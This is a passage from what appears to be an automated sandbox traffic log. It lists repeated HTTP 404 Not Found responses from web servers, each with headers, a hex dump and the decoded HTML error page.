2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:45 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:47 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:47 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:47 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:54 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:56 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:56 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:56 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 08:38:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 